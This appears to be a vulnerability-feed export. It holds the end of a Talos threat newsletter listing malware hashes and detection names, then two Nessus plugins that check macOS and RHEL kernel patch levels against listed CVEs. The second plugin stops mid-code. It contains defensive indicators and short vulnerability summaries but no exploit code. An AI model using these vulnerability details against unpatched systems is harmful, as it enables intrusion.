**[64f3633e009650708c070751bd7c7c28cd127b7a65d4ab4907dbe8ddaa01ec8b](<https://www.virustotal.com/gui/file/64f3633e009650708c070751bd7c7c28cd127b7a65d4ab4907dbe8ddaa01ec8b/details>) \n**MD5: **42143a53581e0304b08f61c2ef8032d7 \n**Typical Filename: **myfile.exe \n**Claimed Product: **N/A \n**Detection Name: **Pdf.Phishing.Phishing::malicious.tht.talos \n** \n****SHA 256: **[f917be677daab5ee91dd3e9ec3f8fd027a58371524f46dd314a13aefc78b2ddc](<https://www.virustotal.com/gui/file/f917be677daab5ee91dd3e9ec3f8fd027a58371524f46dd314a13aefc78b2ddc/details>) \n**MD5: **c5608e40f6f47ad84e2985804957c342 \n**Typical Filename: **FlashHelperServices.exe \n**Claimed Product: **Flash Helper Service \n**Detection Name:** PUA:2144FlashPlayer-tpd \n** \n****SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5: **47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename: **qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name: **Win.Trojan.Generic::in10.talos \n** \n****SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5: **e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin** ** \n**Claimed Product: **N/A \n**Detection Name:** W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/gui/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5: **799b30f47060ca05d80ece53866e01cc \n**Typical Filename: **mf2016341595.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.Generic:Gen.22fz.1201 \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "modified": "2019-12-12T11:00:01", "published": "2019-12-12T11:00:01", "id": "TALOSBLOG:6DED316F2A69ED503F8D797997ECBE1E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/DerWtWsHX8g/threat-source-newsletter-dec-12-2019.html", "type": "talosblog", "title": "Threat Source newsletter (Dec. 12, 2019)", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-12-13T07:52:24", "bulletinFamily": "scanner", "description": "The remote host is running a version of macOS / Mac OS X that is 10.13.x prior\nto 10.13.6 Security Update 2019-007, 10.14.x prior to 10.14.6 Security Update\n2019-002, or 10.15.x prior to 10.15.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - slapd in OpenLDAP before 2.4.30 allows remote attackers\n to cause a denial of service (assertion failure and\n daemon exit) via an LDAP search query with attrsOnly set\n to true, which causes empty attributes to be returned.\n (CVE-2012-1164)\n\n - libraries/libldap/tls_m.c in OpenLDAP, possibly 2.4.31\n and earlier, when using the Mozilla NSS backend, always\n uses the default cipher suite even when TLSCipherSuite\n is set, which might cause OpenLDAP to use weaker ciphers\n than intended and make it easier for remote attackers to\n obtain sensitive information. (CVE-2012-2668)\n\n - The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier\n does not properly count references, which allows remote\n attackers to cause a denial of service (slapd crash) by\n unbinding immediately after a search request, which\n triggers rwm_conn_destroy to free the session context\n while it is being used by rwm_op_search. (CVE-2013-4449)\n\n - The deref_parseCtrl function in\n servers/slapd/overlays/deref.c in OpenLDAP 2.4.13\n through 2.4.40 allows remote attackers to cause a denial\n of service (NULL pointer dereference and crash) via an\n empty attribute list in a deref control in a search\n request. (CVE-2015-1545)\n\n - tcpdump before 4.9.3 has a heap-based buffer over-read\n related to aoe_print in print-aoe.c and lookup_emem in\n addrtoname.c. (CVE-2017-16808)\n\n - tcpdump before 4.9.3 mishandles the printing of SMB data\n (issue 1 of 2). (CVE-2018-10103)\n\n - tcpdump before 4.9.3 mishandles the printing of SMB data\n (issue 2 of 2). (CVE-2018-10105)\n\n - The LDP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-ldp.c:ldp_tlv_print().\n (CVE-2018-14461)\n\n - The ICMP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-icmp.c:icmp_print(). (CVE-2018-14462)\n\n - The VRRP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-vrrp.c:vrrp_print(). (CVE-2018-14463)\n\n - The LMP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-lmp.c:lmp_print_data_link_subobjs().\n (CVE-2018-14464)\n\n - The RSVP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-rsvp.c:rsvp_obj_print().\n (CVE-2018-14465)\n\n - The Rx parser in tcpdump before 4.9.3 has a buffer over-\n read in print-rx.c:rx_cache_find() and\n rx_cache_insert(). (CVE-2018-14466)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_capabilities_print()\n (BGP_CAPCODE_MP). (CVE-2018-14467)\n\n - The FRF.16 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-fr.c:mfr_print(). (CVE-2018-14468)\n\n - The IKEv1 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-isakmp.c:ikev1_n_print().\n (CVE-2018-14469)\n\n - The Babel parser in tcpdump before 4.9.3 has a buffer\n over-read in print-babel.c:babel_print_v2().\n (CVE-2018-14470)\n\n - The command-line argument parser in tcpdump before 4.9.3\n has a buffer overflow in tcpdump.c:get_next_file().\n (CVE-2018-14879)\n\n - The OSPFv3 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-ospf6.c:ospf6_print_lshdr().\n (CVE-2018-14880)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_capabilities_print()\n (BGP_CAPCODE_RESTART). (CVE-2018-14881)\n\n - The ICMPv6 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-icmp6.c. (CVE-2018-14882)\n\n - The IEEE 802.11 parser in tcpdump before 4.9.3 has a\n buffer over-read in print-802_11.c for the Mesh Flags\n subfield. (CVE-2018-16227)\n\n - The HNCP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-hncp.c:print_prefix().\n (CVE-2018-16228)\n\n - The DCCP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-dccp.c:dccp_print_option().\n (CVE-2018-16229)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_attr_print()\n (MP_REACH_NLRI). (CVE-2018-16230)\n\n - The BGP parser in tcpdump before 4.9.3 allows stack\n consumption in print-bgp.c:bgp_attr_print() because of\n unlimited recursion. (CVE-2018-16300)\n\n - libpcap before 1.9.1, as used in tcpdump before 4.9.3,\n has a buffer overflow and/or over-read because of errors\n in pcapng reading. (CVE-2018-16301)\n\n - The SMB parser in tcpdump before 4.9.3 has buffer over-\n reads in print-smb.c:print_trans() for \\MAILSLOT\\BROWSE\n and \\PIPE\\LANMAN. (CVE-2018-16451)\n\n - The SMB parser in tcpdump before 4.9.3 has stack\n exhaustion in smbutil.c:smb_fdata() via recursion.\n (CVE-2018-16452)\n\n - An issue was discovered in the server in OpenLDAP before\n 2.4.48. When the server administrator delegates rootDN\n (database admin) privileges for certain databases but\n wants to maintain isolation (e.g., for multi-tenant\n deployments), slapd does not properly stop a rootDN from\n requesting authorization as an identity from another\n database during a SASL bind or with a proxyAuthz (RFC\n 4370) control. (It is not a common configuration to\n deploy a system where the server administrator and a DB\n administrator enjoy different levels of trust.)\n (CVE-2019-13057)\n\n - An issue was discovered in OpenLDAP 2.x before 2.4.48.\n When using SASL authentication and session encryption,\n and relying on the SASL security layers in slapd access\n controls, it is possible to obtain access that would\n otherwise be denied via a simple bind for any identity\n covered in those ACLs. After the first SASL bind is\n completed, the sasl_ssf value is retained for all new\n non-SASL connections. Depending on the ACL\n configuration, this can affect different types of\n operations (searches, modifications, etc.). In other\n words, a successful authorization step completed by one\n user affects the authorization requirement for a\n different user. (CVE-2019-13565)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 mishandles\n certain length values because of reuse of a variable.\n This may open up an attack vector involving extra data\n at the end of a request. (CVE-2019-15161)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 on non-Windows\n platforms provides details about why authentication\n failed, which might make it easier for attackers to\n enumerate valid usernames. (CVE-2019-15162)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 allows attackers\n to cause a denial of service (NULL pointer dereference\n and daemon crash) if a crypt() call fails.\n (CVE-2019-15163)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 allows SSRF\n because a URL may be provided as a capture source.\n (CVE-2019-15164)\n\n - sf-pcapng.c in libpcap before 1.9.1 does not properly\n validate the PHB header length before allocating memory.\n (CVE-2019-15165)\n\n - lmp_print_data_link_subobjs() in print-lmp.c in tcpdump\n before 4.9.3 lacks certain bounds checks.\n (CVE-2019-15166)\n\n - In libexpat before 2.2.8, crafted XML input could fool\n the parser into changing from DTD parsing to document\n parsing too early; a consecutive call to\n XML_GetCurrentLineNumber (or XML_GetCurrentColumnNumber)\n then resulted in a heap-based buffer over-read.\n (CVE-2019-15903)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "MACOS_HT210788.NASL", "href": "https://www.tenable.com/plugins/nessus/131957", "title": "macOS 10.15.x < 10.15.2 / 10.14.x < 10.14.6 Security Update 2019-002 / 10.13.x < 10.13.6 Security Update 2019-007", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131957);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\n \"CVE-2012-1164\",\n \"CVE-2012-2668\",\n \"CVE-2013-4449\",\n \"CVE-2015-1545\",\n \"CVE-2017-16808\",\n \"CVE-2018-10103\",\n \"CVE-2018-10105\",\n \"CVE-2018-14461\",\n \"CVE-2018-14462\",\n \"CVE-2018-14463\",\n \"CVE-2018-14464\",\n \"CVE-2018-14465\",\n \"CVE-2018-14466\",\n \"CVE-2018-14467\",\n \"CVE-2018-14468\",\n \"CVE-2018-14469\",\n \"CVE-2018-14470\",\n \"CVE-2018-14879\",\n \"CVE-2018-14880\",\n \"CVE-2018-14881\",\n \"CVE-2018-14882\",\n \"CVE-2018-16227\",\n \"CVE-2018-16228\",\n \"CVE-2018-16229\",\n \"CVE-2018-16230\",\n \"CVE-2018-16300\",\n \"CVE-2018-16301\",\n \"CVE-2018-16451\",\n \"CVE-2018-16452\",\n \"CVE-2019-13057\",\n \"CVE-2019-13565\",\n \"CVE-2019-15161\",\n \"CVE-2019-15162\",\n \"CVE-2019-15163\",\n \"CVE-2019-15164\",\n \"CVE-2019-15165\",\n \"CVE-2019-15166\",\n \"CVE-2019-15167\",\n \"CVE-2019-15903\",\n \"CVE-2019-8828\",\n \"CVE-2019-8830\",\n \"CVE-2019-8832\",\n \"CVE-2019-8833\",\n \"CVE-2019-8837\",\n \"CVE-2019-8838\",\n \"CVE-2019-8839\",\n \"CVE-2019-8842\",\n \"CVE-2019-8847\",\n \"CVE-2019-8848\",\n \"CVE-2019-8852\",\n \"CVE-2019-8853\",\n \"CVE-2019-8856\"\n );\n script_bugtraq_id(\n 52404,\n 53823,\n 63190,\n 72519\n );\n script_xref(name:\"APPLE-SA\", value:\"HT210788\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-12-06\");\n\n script_name(english:\"macOS 10.15.x < 10.15.2 / 10.14.x < 10.14.6 Security Update 2019-002 / 10.13.x < 10.13.6 Security Update 2019-007\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 10.13.x prior\nto 10.13.6 Security Update 2019-007, 10.14.x prior to 10.14.6 Security Update\n2019-002, or 10.15.x prior to 10.15.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - slapd in OpenLDAP before 2.4.30 allows remote attackers\n to cause a denial of service (assertion failure and\n daemon exit) via an LDAP search query with attrsOnly set\n to true, which causes empty attributes to be returned.\n (CVE-2012-1164)\n\n - libraries/libldap/tls_m.c in OpenLDAP, possibly 2.4.31\n and earlier, when using the Mozilla NSS backend, always\n uses the default cipher suite even when TLSCipherSuite\n is set, which might cause OpenLDAP to use weaker ciphers\n than intended and make it easier for remote attackers to\n obtain sensitive information. (CVE-2012-2668)\n\n - The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier\n does not properly count references, which allows remote\n attackers to cause a denial of service (slapd crash) by\n unbinding immediately after a search request, which\n triggers rwm_conn_destroy to free the session context\n while it is being used by rwm_op_search. (CVE-2013-4449)\n\n - The deref_parseCtrl function in\n servers/slapd/overlays/deref.c in OpenLDAP 2.4.13\n through 2.4.40 allows remote attackers to cause a denial\n of service (NULL pointer dereference and crash) via an\n empty attribute list in a deref control in a search\n request. (CVE-2015-1545)\n\n - tcpdump before 4.9.3 has a heap-based buffer over-read\n related to aoe_print in print-aoe.c and lookup_emem in\n addrtoname.c. (CVE-2017-16808)\n\n - tcpdump before 4.9.3 mishandles the printing of SMB data\n (issue 1 of 2). (CVE-2018-10103)\n\n - tcpdump before 4.9.3 mishandles the printing of SMB data\n (issue 2 of 2). (CVE-2018-10105)\n\n - The LDP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-ldp.c:ldp_tlv_print().\n (CVE-2018-14461)\n\n - The ICMP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-icmp.c:icmp_print(). (CVE-2018-14462)\n\n - The VRRP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-vrrp.c:vrrp_print(). (CVE-2018-14463)\n\n - The LMP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-lmp.c:lmp_print_data_link_subobjs().\n (CVE-2018-14464)\n\n - The RSVP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-rsvp.c:rsvp_obj_print().\n (CVE-2018-14465)\n\n - The Rx parser in tcpdump before 4.9.3 has a buffer over-\n read in print-rx.c:rx_cache_find() and\n rx_cache_insert(). (CVE-2018-14466)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_capabilities_print()\n (BGP_CAPCODE_MP). (CVE-2018-14467)\n\n - The FRF.16 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-fr.c:mfr_print(). (CVE-2018-14468)\n\n - The IKEv1 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-isakmp.c:ikev1_n_print().\n (CVE-2018-14469)\n\n - The Babel parser in tcpdump before 4.9.3 has a buffer\n over-read in print-babel.c:babel_print_v2().\n (CVE-2018-14470)\n\n - The command-line argument parser in tcpdump before 4.9.3\n has a buffer overflow in tcpdump.c:get_next_file().\n (CVE-2018-14879)\n\n - The OSPFv3 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-ospf6.c:ospf6_print_lshdr().\n (CVE-2018-14880)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_capabilities_print()\n (BGP_CAPCODE_RESTART). (CVE-2018-14881)\n\n - The ICMPv6 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-icmp6.c. (CVE-2018-14882)\n\n - The IEEE 802.11 parser in tcpdump before 4.9.3 has a\n buffer over-read in print-802_11.c for the Mesh Flags\n subfield. (CVE-2018-16227)\n\n - The HNCP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-hncp.c:print_prefix().\n (CVE-2018-16228)\n\n - The DCCP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-dccp.c:dccp_print_option().\n (CVE-2018-16229)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_attr_print()\n (MP_REACH_NLRI). (CVE-2018-16230)\n\n - The BGP parser in tcpdump before 4.9.3 allows stack\n consumption in print-bgp.c:bgp_attr_print() because of\n unlimited recursion. (CVE-2018-16300)\n\n - libpcap before 1.9.1, as used in tcpdump before 4.9.3,\n has a buffer overflow and/or over-read because of errors\n in pcapng reading. (CVE-2018-16301)\n\n - The SMB parser in tcpdump before 4.9.3 has buffer over-\n reads in print-smb.c:print_trans() for \\MAILSLOT\\BROWSE\n and \\PIPE\\LANMAN. (CVE-2018-16451)\n\n - The SMB parser in tcpdump before 4.9.3 has stack\n exhaustion in smbutil.c:smb_fdata() via recursion.\n (CVE-2018-16452)\n\n - An issue was discovered in the server in OpenLDAP before\n 2.4.48. When the server administrator delegates rootDN\n (database admin) privileges for certain databases but\n wants to maintain isolation (e.g., for multi-tenant\n deployments), slapd does not properly stop a rootDN from\n requesting authorization as an identity from another\n database during a SASL bind or with a proxyAuthz (RFC\n 4370) control. (It is not a common configuration to\n deploy a system where the server administrator and a DB\n administrator enjoy different levels of trust.)\n (CVE-2019-13057)\n\n - An issue was discovered in OpenLDAP 2.x before 2.4.48.\n When using SASL authentication and session encryption,\n and relying on the SASL security layers in slapd access\n controls, it is possible to obtain access that would\n otherwise be denied via a simple bind for any identity\n covered in those ACLs. After the first SASL bind is\n completed, the sasl_ssf value is retained for all new\n non-SASL connections. Depending on the ACL\n configuration, this can affect different types of\n operations (searches, modifications, etc.). In other\n words, a successful authorization step completed by one\n user affects the authorization requirement for a\n different user. (CVE-2019-13565)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 mishandles\n certain length values because of reuse of a variable.\n This may open up an attack vector involving extra data\n at the end of a request. (CVE-2019-15161)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 on non-Windows\n platforms provides details about why authentication\n failed, which might make it easier for attackers to\n enumerate valid usernames. (CVE-2019-15162)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 allows attackers\n to cause a denial of service (NULL pointer dereference\n and daemon crash) if a crypt() call fails.\n (CVE-2019-15163)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 allows SSRF\n because a URL may be provided as a capture source.\n (CVE-2019-15164)\n\n - sf-pcapng.c in libpcap before 1.9.1 does not properly\n validate the PHB header length before allocating memory.\n (CVE-2019-15165)\n\n - lmp_print_data_link_subobjs() in print-lmp.c in tcpdump\n before 4.9.3 lacks certain bounds checks.\n (CVE-2019-15166)\n\n - In libexpat before 2.2.8, crafted XML input could fool\n the parser into changing from DTD parsing to document\n parsing too early; a consecutive call to\n XML_GetCurrentLineNumber (or XML_GetCurrentColumnNumber)\n then resulted in a heap-based buffer over-read.\n (CVE-2019-15903)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210788\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 10.15.2 / 10.14.x < 10.14.6 Security Update 2019-002 / 10.13.x < 10.13.6 Security Update 2019-007 or\nlater\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8852\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::apple::macos::get_app_info();\n\nconstraints = [\n { 'min_version' : '10.15', 'fixed_version' : '10.15.2' },\n { 'min_version' : '10.13', 'max_version' : '10.13.6', 'fixed_build': '17G10021', 'fixed_display' : '10.13.6 Security Update 2019-007' },\n { 'min_version' : '10.14', 'max_version' : '10.14.6', 'fixed_build': '18G2022', 'fixed_display' : '10.14.6 Security Update 2019-002' }\n];\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:12:28", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.6\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* kernel: brcmfmac heap buffer overflow in brcmf_wowl_nd_results\n(CVE-2019-9500)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* [HPEMC 7.7 BUG] Protect against concurrent calls into UV BIOS\n(BZ#1720367)\n\n* A cluster node has multiple hung ", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "REDHAT-RHSA-2019-4168.NASL", "href": "https://www.tenable.com/plugins/nessus/131982", "title": "RHEL 7 : kernel (RHSA-2019:4168)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:4168. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(131982);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\"CVE-2019-9500\");\n script_xref(name:\"RHSA\", value:\"2019:4168\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2019:4168)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.6\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* kernel: brcmfmac heap buffer overflow in brcmf_wowl_nd_results\n(CVE-2019-9500)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* [HPEMC 7.7 BUG] Protect against concurrent calls into UV BIOS\n(BZ#1720367)\n\n* A cluster node has multiple hung 'mv' processes that are accessing a\ngfs2 filesystem. (BZ#1721911)\n\n* alua messages flooding serial console leading to cluster failover\ndelays (BZ#1754849)\n\n* kernel build: parallelize redhat/mod-sign.sh (BZ#1755329)\n\n* kernel build: speed up module compression step (BZ#1755338)\n\n* Nested VirtualBox VMs on Windows guest has the potential of\nimpacting memory region allocated to other KVM guests (BZ#1755782)\n\n* [Intel 7.8 Bug] [KVM][CLX] CPUID_7_0_EDX_ARCH_CAPABILITIES is not\nenabled in VM. (BZ#1757756)\n\n* OS getting restarted because of driver issue with QLogic Corp.\nISP2532-based 8Gb Fibre Channel to PCI Express HBA [1077:2532] (rev\n02). (BZ#1759446)\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic()\n(BZ#1772810)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:4168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-9500\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bpftool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7\\.6([^0-9]|$)\", string:os_ver)) 